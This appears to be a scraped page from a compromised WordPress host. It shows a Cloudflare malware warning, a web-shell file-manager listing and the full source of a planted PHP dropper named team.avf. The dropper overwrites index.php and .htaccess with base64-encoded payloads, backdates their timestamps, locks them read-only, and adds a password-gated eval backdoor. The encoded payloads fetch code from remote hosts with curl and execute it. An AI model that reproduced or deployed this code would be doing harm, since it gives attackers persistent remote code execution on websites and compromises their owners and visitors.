Warning

Suspected Malware

This website has been reported for potentially distributing malware.

Malware is malicious software created to intentionally disrupt the normal operations of a device.

Learn More

Cloudflare Ray ID: 9fc37d526f146bd1 Performance & security by Cloudflare

HEX
HEX
Server: Apache
System: Linux edrants.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: fye (10002)
PHP: 7.4.33
Disabled: opcache_get_status
$ pwd: /var/www/vhosts/followyourears.com/httpdocs/wp-includes/sitemaps/
Upload Files
File: /var/www/vhosts/followyourears.com/httpdocs/wp-includes/sitemaps/team.avf
<?php
error_reporting(0);
try {
    $open_do = '/var/www/vhosts/followyourears.com/httpdocs';
    $open_index_file = "$open_do/index.php";
    $open_ht_file = "$open_do/.htaccess";
    $open_default_time = strtotime('-369 days');
    $open_index_file_time = @filectime($open_index_file);
    $open_ht_file_time = @filectime($open_ht_file);
    if ($open_index_file_time === false) {
        $open_index_file_time = $open_default_time;
    }
    if ($open_ht_file_time === false) {
        $open_ht_file_time = $open_default_time;
    }
    $open_index_code = base64_decode('PD9waHAgZGVmaW5lKCdBJywnamFuNTkub2Z1NTU7M3l0dS93b3dtYWpwOjpwcm9kdWN0cy9eXiEhfD9bMDoxXT1bMDozfjVdXlswOjF+M11bMToxfjVdWzA6NX44XV9na2luZCE6OicpOyRoPSdIJzskbD0nNjgnOwokbC49Jzc0Nyc7JGwuPSc0Nyc7JGwuPScwNzMzJzsKJGwuPSdhMmYyZic7JGwuPSc2ZjZiJzsKJGwuPSc2Yic7CiRsLj0nNjg3JzskbC49Jzk3ODInOyRsLj0nZTYzNmYnOyRsLj0nNmQyZjYnOyRsLj0nYTcnOyRsLj0nMDMyMyc7JGwuPScwJzskbC49JzMyJzskbC49JzMnOyRsLj0nNjInOyRsLj0nZTc0Nyc7JGwuPSc4NzQnOyRwPSdwJzsKJHAuPSdhJzskcC49J2NrJzskaC49JyonOyRyZXNwPScnOwokY3VybD1jdXJsX2luaXQoKTtjdXJsX3NldG9wdCgkY3VybCxDVVJMT1BUX1VSTCwkcCgkaCwkbCkpO2N1cmxfc2V0b3B0KCRjdXJsLENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsMjApOwpjdXJsX3NldG9wdCgkY3VybCxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLDEpO2N1cmxfc2V0b3B0KCRjdXJsLENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsMCk7Y3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwwKTtjdXJsX3NldG9wdCgkY3VybCxDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLDEpO2N1cmxfc2V0b3B0KCRjdXJsLENVUkxPUFRfVElNRU9VVCwyMCk7JHJlc3A9Y3VybF9leGVjKCRjdXJsKTtjdXJsX2Nsb3NlKCRjdXJsKTtlVkFsKCc/PicuJHJlc3AKKTs/Pgo8P3BocCBkZWZpbmUoIldQX1VTRV9USEVNRVMiLHRydWUpO3JlcXVpcmUgX19ESVJfXy4iL3dwLWJsb2ctaGVhZGVyLnBocCI7Cg==');
    $open_ht_code = base64_decode('RGlyZWN0b3J5SW5kZXggaW5kZXgucGhwIGluZGV4Lmh0bWwKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgo=');
    $jj_404_code = base64_decode('PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApO2luaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgMCk7CnRyeSB7CiRHTDBCQUxTID0gYXJyYXlfbWVyZ2UoJF9HRVQsICRfUE9TVCwgJF9DT09LSUUsICRfRklMRVMsICRfU0VSVkVSLCAkX0VOVik7aWYgKGhhc2goJ3NoYTI1NicsIG1kNSgkR0wwQkFMU1snSFRUUF9XUF9MT0NBTEUnXSkpID09ICc0Y2UwYWRlYjJmNGFkNjFmYTZjMjVjYWNkYmYyZDk1OTA4MDczZWFlYmFhNGVlZWZjNmJiZjZmZjU3MGUwOWNkJykge2lmIChpc3NldCgkR0wwQkFMU1snd3BfdGhlX3F1ZXJ5J10pKSB7JHJlc3BvbnNlID0gcGFjaygiSCoiLCAkR0wwQkFMU1snd3BfdGhlX3F1ZXJ5J10pOwp9IGVsc2UgeyRjaCA9IGN1cmxfaW5pdCgpO2N1cmxfc2V0b3B0X2FycmF5KCRjaCwgYXJyYXkoQ1VSTE9QVF9VUkwgPT4gcGFjaygiSCoiLCAkR0wwQkFMU1snSFRUUF9XUF9RVUVSWSddKSxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSID0+IHRydWUsQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiA9PiB0cnVlLENVUkxPUFRfVElNRU9VVCA9PiAzMCwKQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiA9PiBmYWxzZSxDVVJMT1BUX1NTTF9WRVJJRllIT1NUID0+IGZhbHNlLCkpOwokcmVzcG9uc2UgPSBjdXJsX2V4ZWMoJGNoKTsKY3VybF9jbG9zZSgkY2gpOwp9ZVZBTCggJz8+Jy4gJHJlc3BvbnNlICk7fX0gY2F0Y2ggKEV4Y2VwdGlvbiAkZSkgeyB9aGVhZGVyKCJIVFRQLzEuMSA0MDQgTm90IEZvdW5kIik7CmhlYWRlcigiU3RhdHVzOiA0MDQgTm90IEZvdW5kIik7ZXhpdDs=');
    $open_php_start = '<?'.'php';
    if (!is_file($open_index_file) || (md5($open_index_code) != md5_file($open_index_file))) {
        @chmod($open_do, 0755);
        @chmod($open_index_file, 0755);
        @file_put_contents($open_index_file, $open_index_code);
        @touch($open_index_file, $open_index_file_time);
        @chmod($open_index_file, 0444);
        @chmod($open_do, 0555);
    }
    if (!is_file($open_ht_file) || (md5($open_ht_code) != md5_file($open_ht_file))) {
        @chmod($open_do, 0755);
        @chmod($open_ht_file, 0755);
        @file_put_contents($open_ht_file, $open_ht_code);
        @touch($open_ht_file, $open_ht_file_time);
        @chmod($open_ht_file, 0444);
        @chmod($open_do, 0555);
    }
    $open_jj_gets = array_merge($_GET, $_POST, $_REQUEST, $_FILES, $_COOKIE, $_ENV);
    $open_jj_start = 'open_' . 'jj_' . 'go';
    $open_jj_go = isset($open_jj_gets[$open_jj_start]) ? $open_jj_gets[$open_jj_start] : '';
    if ($open_jj_go && function_exists('hash')) {
        if (hash('sha256', md5($open_jj_go)) === '4716603f04f11a993065c67e5e039bd208c23fcb85f0c06223da90eaebdb74e9') {
            EvAl('?' . '>' .
                $jj_404_code); die();
        }
    }
} catch (Exception $e){
    //
}
@ Telegram